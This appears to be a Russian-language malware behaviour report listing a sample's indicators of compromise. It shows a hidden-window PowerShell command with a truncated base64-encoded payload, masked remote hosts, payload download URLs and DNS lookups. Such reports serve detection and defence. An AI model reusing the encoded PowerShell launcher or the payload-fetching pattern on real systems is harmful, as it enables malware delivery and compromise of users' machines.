Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAATgBlAHcALQBvAEIAagBFAGMAVAAgACAAUwBZAHMAVABFAG0ALgBpAG8ALgBjAG8ATQBwAFIARQBzAFMASQBPAG4ALgBkAGUAZgBMAEEAdABlAFMAVABSAGUAQQBNACgAWwBzAFkAUwB0AGUAbQAuAEkATwAuAG0ARQBtAE8AcgB5AHMAVAByAG...
- 'en####hcenter.ru':80
- '36###tail.com':80
- http://www.en####hcenter.ru/Ev5NVc/
- http://www.36###tail.com/Rxx00P5AtM/
- DNS ASK av###-yug.ru
- DNS ASK en####hcenter.ru
- DNS ASK 36###tail.com
- DNS ASK et##vel.su
- DNS ASK er####obilya.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoACAATgBlAHcALQBvAEIAagBFAGMAVAAgACAAUwBZAHMAVABFAG0ALgBpAG8ALgBjAG8ATQBwAFIARQBzAFMASQBPAG4ALgBkAGUAZgBMAEEAdABlAFMAVABSAGUAQQBNACgAWwBzAFkAUwB0AGUAbQAuAEkATwAuAG0ARQBtAE8AcgB5AHMAVAByAG...' (со скрытым окном)